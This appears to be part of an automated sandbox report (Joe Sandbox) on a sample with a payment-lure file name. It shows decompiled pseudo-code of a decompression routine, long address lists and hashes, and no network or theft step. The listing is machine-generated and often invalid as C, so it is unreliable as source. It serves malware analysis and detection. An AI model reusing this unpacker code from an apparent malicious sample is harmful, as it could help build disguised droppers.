								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004070ab
0x004070ab
0x004070af
0x00407166
0x00407169
0x00407175
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x004070b5
0x004070b9
0x004075fa
0x004075fa
0x004075fd
0x00407601
0x00407601
0x004070bf
0x004070c5
0x004070c8
0x004070cc
0x004070cf
0x004070d3
0x00407599
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x00000000
0x004075f6
0x004070d9
0x004070dc
0x004070e2
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x0040710d
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
